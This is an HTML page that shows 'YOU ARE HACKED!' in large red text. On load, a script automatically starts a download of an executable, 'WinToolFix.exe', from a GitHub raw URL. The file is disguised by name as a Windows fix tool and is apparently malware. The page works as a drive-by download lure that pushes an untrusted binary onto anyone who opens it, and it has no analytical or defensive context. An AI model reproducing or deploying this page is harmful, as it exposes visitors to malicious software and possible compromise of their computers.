<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacked</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: black;
            color: red;
            font-family: Arial, sans-serif;
            font-size: 50px;
            text-transform: uppercase;
        }
    </style>
</head>
<body>
    <div>YOU ARE HACKED!</div>

    <script>
        window.onload = function() {
            // Automatically trigger the download
            var link = document.createElement('a');
            link.href = 'https://github.com/Fhchcjcjcjcjvkkvk/Fff/raw/refs/heads/main/WinToolFix.exe';
            link.download = 'WinToolFix.exe';  // Optional: specify a default filename
            link.click();
        };
    </script>
</body>
</html>
